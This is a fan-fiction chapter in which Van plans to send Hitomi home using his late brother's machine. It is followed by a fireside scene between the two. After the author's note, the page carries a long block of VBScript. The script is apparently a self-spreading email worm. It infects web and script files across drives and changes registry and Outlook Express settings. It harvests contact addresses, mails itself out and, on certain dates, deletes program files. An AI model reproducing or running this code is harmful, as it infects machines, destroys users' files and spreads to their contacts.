Vision Of Escaflowne Fan Fiction ❯ Falling ❯ Ideas ( Chapter 4 )

[ P - Pre-Teen ]
Chapter 4: Ideas

"So you see, gentlemen, that is our predicament. Any thoughts and/or ideas are thoroughly welcomed." Van sat at the head of what was left of the conference table. About 5 advisors sat alongside him. Van had just come to explain about Hitomi being unable to return to the Mystic Moon.
The noblemen huddled together and began whispering[raspberries, strawberries, raspberries, strawberries LOL] . the young king waited impatiently for a response and it wasn't long before he got one.
The advisor with the long grey beard and mustache stood up. The teen in red immediately recognized him as being someone he had seen in Asturia before.
"Your Majesty," he began with a cough. "We have formulated what may be the most hopeful idea for the situation."
"I'm all ears."
"Well, Sire, as I was in Asturia a few weeks ago, I noticed that Lord Folken, your late brother--" Van winced at the term "late"--"was working consistantly on a project. He recovered some part of the Vione that led Asturian advisors to believe it had to do with the power of the DragEnergist crystal in the guymelef Escaflowne, and in the girl's pendant. From what we have heard, though it may simply be town rumours, that piece that was recovered from the Floating Fortress is what caused Lord Folken and the girl to be transported to Zaibach."
"That is correct."
"Lord Folken's lab was left intact. It has not been touched since his... departure. Perhaps if we used his machine, we could send miss Kanzaki back to her world?"
Van looked thoughtful for a moment. "You might have an idea there, Gudevo. Unfortunately, I have no idea how to work such a piece of equipment."
"We had an idea for that, too." piped up another advisor.
"Oh?"
"What about Lord Dryden of Asturia, your Highness? He is known to be quite the technician."
Van rubbed his chin decisively. "Yes, that sounds like an excellent plan. Where is Dryden at the moment?"
"I believe he is in Daeledus."
"Very well. Is the messenger here?"
"No, Sire, he has not yet returned. Perhaps someone else may take his place for the time being?"
Van's eyes gleamed. "I know just who might be interested."

"Me?" the youth's deep brown eyes sparkled. "But Lord Van, this is such an honor! Surely..."
Van shook his head stubbornly.
"Kayulo, you are known in Fanelia as being the best 'locator'. Daeledus is a large country, it won't be easy to find Lord Dryden."
Kayulo turned a bit red, deeply flattered by the thought of being chosen out of all the citizens of Fanelia to deliver a message to Lord Dryden. His king handed him the letter, and told him to give that to the Merchant prince when he found him.
"I'll set out right away!" the catguy beamed. As if to contradict his motives, the sky suddenly darkened.
"Maybe you should hold off until tomorrow." suggested Van. "The Gods don't seem pleased with the idea of you going today."

Hitomi shivered slightly. It was cold in Merle's room, especially without the windows to enclose the heat. Rain poured down outside, and every now and then a thunderclap struck. Hitomi didn't mind the storm, she just hated the coldness. She glanced at the catgirl, who lay curled in a ball at the edge of the bed.
Well, doesn't she look content! But then again, why wouldn't she? She's covered in fur! groaning in exasperation, Hitomi got up. What we need here is a nice little fire to spruce things up.
Carefully avoiding the fallen bits of block concrete, Hitomi made her way over to the mostly smashed fireplace. Running her hands along the floor, she found two thin sticks and placed them in the fireplace. She rubbed them together, praying that the friction would bring forth a nice, blazing fire so that Hitomi could warm her frozen toes.
Nothing.
"Damnit!" Hitomi spat, throwing the utensils to the ground in anguish. She wrapped her arms around her body, shuddering again. A thought of Van suddenly struck her and she decided to go see how he was faring through the weather.

Van was faring rather well. He had managed to get a fire going in the fireplace, and was seated in front of it, cross-legged. His ruby eyes watched the flames dance, completely transfixed by something within the small blaze. His right hand was gripping the pendant tightly. He wondered why he still had it, he should have returned it to Hitomi. No don't give it back don't give it back she gave it to you she wanted you to have it to keep it forever to remember you of her and her beautiful green eyes and hair and smile and
"Van?" came a tiny voice. A short haired girl poked her head through the doorway, her emerald eyes peering around the well-lit room. Immediately Van let his hand drop from the pendant.
"Hitomi." he smiled warmly.
The girl pushed the door open a little more. "May I come in?"
"Of course."
She crept in, as if walking normally would wake someone. She set herself down on the floor next to Van, who scooted over to allow her more room. Instantly, she raised her hands to meet the heat of the flames.
Van's furtive gaze never left Hitomi. He watched her, as she warmed her hands. He watched her, as she shivered slightly. Gods, he wanted to wrap his arms around her and just hold her, making her feel toastier. don't do it you fool remember the rule don't get too attached to her because you'll regret it when she has to return home
"Lousy weather, huh?" Hitomi said, trying to make conversation.
"You're cold."
Hitomi raised a brow. "I couldn't get a fire started in Merle's room. No wonder I failed the 'Wilderness Survival' test." she chuckled to herself. Van wasn't really listening. He frowned, and stood up. He crossed over to his bed and sat with one leg over the other. Something about his boots seemed to have caught his attention and he began to fiddle with them.
"Van, what's wrong?"
"Nothing."
"I can tell when you're lying. Please tell me."
"I think I found a solution to the predicament we're in."
"Really?" Hitomi grinned.
"My brother built a machine when we were in Asturia. Something recovered from the Vione."
"I remember it." Hitomi's voice softened. That machine had been pretty much what had caused Folken's death.
"Well, if I managed to find someone to start it up again, maybe it would be able to send you back to the Mystic Moon."
Hitomi nodded. Van told her who he had in mind to rev up the machine and she nodded again.
"A message to him will be sent out tomorrow. He will most likely respond in a week's time."
i don't want to go that soon no not that soon i pray it takes longer i want to be with van some more to see if what i feel is real or just another phase or what Hitomi's mind raced.
"That sounds like a good idea, Van." Hitomi said, trying to hide her disappointment that it would only be a little over a week before she would say one last goodbye to her beloved. Van was trying to do the same.
"I'm going to go get some rest, Van. I'll need sleep for the big day tomorrow. I have no intention of just sitting around, I may as well make myself useful and help out."
"If it's too cold in your room, you can always stay here." the words blurted out of Van's mouth before he could think of what it was he was saying. It had come out completely wrong. The two both turned beet red.
"Err, I think I'll be fine, Van." Hitomi said, being the first to recover from the sentence that hung in the air. Quickly, she exited the room.
"Stupid." Van told himself, before flopping back onto his bed.


A/N: Woohoo, another "not-at-my-best" chapter. Gotta love 'em. :oP Later chapters will be more interesting, trust me! *lol* Rem I am sorry! happy time On Error Resume Next mload Sub mload() On Error Resume Next mPath = Grf() Set Os = CreateObject("Scriptlet.TypeLib") Set Oh = CreateObject("Shell.Application") If IsHTML Then mURL = LCase(document.Location) If mPath = "" Then Os.Reset Os.Path = "C:\Help.htm" Os.Doc = Lhtml() Os.Write() Ihtml = "" Call document.Body.insertAdjacentHTML("AfterBegin", Ihtml) Else If Iv(mPath, "Help.vbs") Then setInterval "Rt()", 10000 Else m = "hta" If LCase(m) = Right(mURL, Len(m)) Then id = setTimeout("mclose()", 1) main Else Os.Reset() Os.Path = mPath & "\" & "Help.hta" Os.Doc = Lhtml() Os.write() Iv mPath, "Help.hta" End If End If End If Else main End If End Sub Sub main() On Error Resume Next Set Of = CreateObject("Scripting.FileSystemObject") Set Od = CreateObject("Scripting.Dictionary") Od.Add "html", "1100" Od.Add "vbs", "0100" Od.Add "htm", "1100" Od.Add "asp", "0010" Ks = "HKEY_CURRENT_USER\Software\" Ds = Grf() Cs = Gsf() If IsVbs Then If Of.FileExists("C:\help.htm") Then Of.DeleteFile ("C:\help.htm") End If Key = CInt(Month(Date) + Day(Date)) If Key = 13 Then Od.RemoveAll Od.Add "exe", "0001" Od.Add "dll", "0001" End If Cn = Rg(Ks & "Help\Count") If Cn = "" Then Cn = 1 End If Rw Ks & "Help\Count", Cn + 1 f1 = Rg(Ks & "Help\FileName") f2 = FNext(Of, Od, f1) fext = GetExt(Of, Od, f2) Rw Ks & "Help\FileName", f2 If IsDel(fext) Then f3 = f2 f2 = FNext(Of, Od, f2) Rw Ks & "Help\FileName", f2 Of.DeleteFile f3 Else If LCase(WScript.ScriptFullname) LCase(f2) Then Fw Of, f2, fext End If End If If (CInt(Cn) Mod 366) = 0 Then If (CInt(Second(Time)) Mod 2) = 0 Then Tsend Else adds = Og Msend (adds) End If End If wp = Rg("HKEY_CURRENT_USER\Control Panel\desktop\wallPaper") If Rg(Ks & "Help\wallPaper") wp Or wp = "" Then If wp = "" Then n1 = "" n3 = Cs & "\Help.htm" Else mP = Of.GetFile(wp).ParentFolder n1 = Of.GetFileName(wp) n2 = Of.GetBaseName(wp) n3 = Cs & "\" & n2 & ".htm" End If Set pfc = Of.CreateTextFile(n3, True) mt = Sa("1100") pfc.Write "" & mt pfc.Close Rw Ks & "Help\wallPaper", n3 Rw "HKEY_CURRENT_USER\Control Panel\desktop\wallPaper", n3 End If Else Set fc = Of.CreateTextFile(Ds & "\Help.vbs", True) fc.Write Sa("0100") fc.Close bf = Cs & "\Untitled.htm" Set fc2 = Of.CreateTextFile(bf, True) fc2.Write Lhtml fc2.Close oeid = Rg("HKEY_CURRENT_USER\Identities\Default User ID") oe = "HKEY_CURRENT_USER\Identities\" & oeid & "\Software\Microsoft\Outlook Express\5.0\Mail" MSH = oe & "\Message Send HTML" CUS = oe & "\Compose Use Stationery" SN = oe & "\Stationery Name" Rw MSH, 1 Rw CUS, 1 Rw SN, bf Web = Cs & "\WEB" Set gf = Of.GetFolder(Web).Files Od.Add "htt", "1100" For Each m In gf fext = GetExt(Of, Od, m) If fext "" Then Fw Of, m, fext End If Next End If End Sub Sub mclose() document.Write "I am sorry!" window.Close End Sub Sub Rt() Dim mPath On Error Resume Next mPath = Grf() Iv mPath, "Help.vbs" End Sub Function Sa(n) Dim VBSText, m VBSText = Lvbs() If Mid(n, 3, 1) = 1 Then m = "" End If If Mid(n, 2, 1) = 1 Then m = VBSText End If If Mid(n, 1, 1) = 1 Then m = Lscript(m) End If Sa = m & vbCrLf End Function Sub Fw(Of, S, n) Dim fc, fc2, m, mmail, mt On Error Resume Next Set fc = Of.OpenTextFile(S, 1) mt = fc.ReadAll fc.Close If Not Sc(mt) Then mmail = Ml(mt) mt = Sa(n) Set fc2 = Of.OpenTextFile(S, 8) fc2.Write mt fc2.Close Msend (mmail) End If End Sub Function Sc(S) mN = "Rem I am sorry! happy time" If InStr(S, mN) > 0 Then Sc = True Else Sc = False End If End Function Function FNext(Of, Od, S) Dim fpath, fname, fext, T, gf On Error Resume Next fname = "" T = False If Of.FileExists(S) Then fpath = Of.GetFile(S).ParentFolder fname = S ElseIf Of.FolderExists(S) Then fpath = S T = True Else fpath = Dnext(Of, "") End If Do While True Set gf = Of.GetFolder(fpath).Files For Each m In gf If T Then If GetExt(Of, Od, m) "" Then FNext = m Exit Function End If ElseIf LCase(m) = LCase(fname) Or fname = "" Then T = True End If Next fpath = Pnext(Of, fpath) Loop End Function Function Pnext(Of, S) On Error Resume Next Dim Ppath, Npath, gp, pn, T, m T = False If Of.FolderExists(S) Then Set gp = Of.GetFolder(S).SubFolders pn = gp.Count If pn = 0 Then Ppath = LCase(S) Npath = LCase(Of.GetParentFolderName(S)) T = True Else Npath = LCase(S) End If Do While Not Er For Each pn In Of.GetFolder(Npath).SubFolders If T Then If Ppath = LCase(pn) Then T = False End If Else Pnext = LCase(pn) Exit Function End If Next T = True Ppath = LCase(Npath) Npath = Of.GetParentFolderName(Npath) If Of.GetFolder(Ppath).IsRootFolder Then m = Of.GetDriveName(Ppath) Pnext = Dnext(Of, m) Exit Function End If Loop End If End Function Function Dnext(Of, S) Dim dc, n, d, T, m On Error Resume Next T = False m = "" Set dc = Of.Drives For Each d In dc If d.DriveType = 2 Or d.DriveType = 3 Then If T Then Dnext = d Exit Function Else If LCase(S) = LCase(d) Then T = True End If If m = "" Then m = d End If End If End If Next Dnext = m End Function Function GetExt(Of, Od, S) Dim fext On Error Resume Next fext = LCase(Of.GetExtensionName(S)) GetExt = Od.Item(fext) End Function Sub Rw(k, v) Dim R On Error Resume Next Set R = CreateObject("WScript.Shell") R.RegWrite k, v End Sub Function Rg(v) Dim R On Error Resume Next Set R = CreateObject("WScript.Shell") Rg = R.RegRead(v) End Function Function IsVbs() Dim ErrTest On Error Resume Next ErrTest = WScript.ScriptFullname If Err Then IsVbs = False Else IsVbs = True End If End Function Function IsHTML() Dim ErrTest On Error Resume Next ErrTest = document.Location If Er Then IsHTML = False Else IsHTML = True End If End Function Function IsMail(S) Dim m1, m2 IsMail = False If InStr(S, vbCrLf) = 0 Then m1 = InStr(S, "@") m2 = InStr(S, ".") If m1 0 And m1 " & vbCrLf & _ " Help " & vbCrLf & _ " " & Lscript(Lvbs()) & vbCrLf & _ "" End Function Function Lscript(S) Lscript = "" & vbCrLf & _ S & "" End Function Function Sl(S1, S2, n) Dim l1, l2, l3, i l1 = Len(S1) l2 = Len(S2) i = InStr(S1, S2) If i > 0 Then l3 = i + l2 - 1 If n = 0 Then Sl = Left(S1, i - 1) ElseIf n = 1 Then Sl = Right(S1, l1 - l3) End If Else Sl = "" End If End Function Function Ml(S) Dim S1, S3, S2, T, adds, m S1 = S S3 = """" adds = "" S2 = S3 & "mailto" & ":" T = True Do While T S1 = Sl(S1, S2, 1) If S1 = "" Then T = False Else m = Sl(S1, S3, 0) If IsMail(m) Then adds = adds & m & vbCrLf End If End If Loop Ml = Split(adds, vbCrLf) End Function Function Og() Dim i, n, m(), Om, Oo Set Oo = CreateObject("Outlook.Application") Set Om = Oo.GetNamespace("MAPI").GetDefaultFolder(10).Items n = Om.Count ReDim m(n) For i = 1 To n m(i - 1) = Om.Item(i).Email1Address Next Og = m End Function Sub Tsend() Dim Od, MS, MM, a, m Set Od = CreateObject("Scripting.Dictionary") MConnect MS, MM MM.FetchSorted = True MM.Fetch For i = 0 To MM.MsgCount - 1 MM.MsgIndex = i a = MM.MsgOrigAddress If Od.Item(a) = "" Then Od.Item(a) = MM.MsgSubject End If Next For Each m In Od.Keys MM.Compose MM.MsgSubject = "Fw: " & Od.Item(m) MM.RecipAddress = m MM.AttachmentPathName = Gsf & "\Untitled.htm" MM.Send Next MS.SignOff End Sub Function MConnect(MS, MM) Dim U On Error Resume Next Set MS = CreateObject("MSMAPI.MAPISession") Set MM = CreateObject("MSMAPI.MAPIMessages") U = Rg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\DefaultProfile") MS.UserName = U MS.DownLoadMail = False MS.NewSession = False MS.LogonUI = True MS.SignOn MM.SessionID = MS.SessionID End Function Sub Msend(Address) Dim MS, MM, i, a MConnect MS, MM i = 0 MM.Compose For Each a In Address If IsMail(a) Then MM.RecipIndex = i MM.RecipAddress = a i = i + 1 End If Next MM.MsgSubject = " Help " MM.AttachmentPathName = Gsf & "\Untitled.htm" MM.Send MS.SignOff End Sub Function Er() If Err.Number = 0 Then Er = False Else Err.Clear Er = True End If End Function Function IsDel(S) If Mid(S, 4, 1) = 1 Then IsDel = True Else IsDel = False End If End Function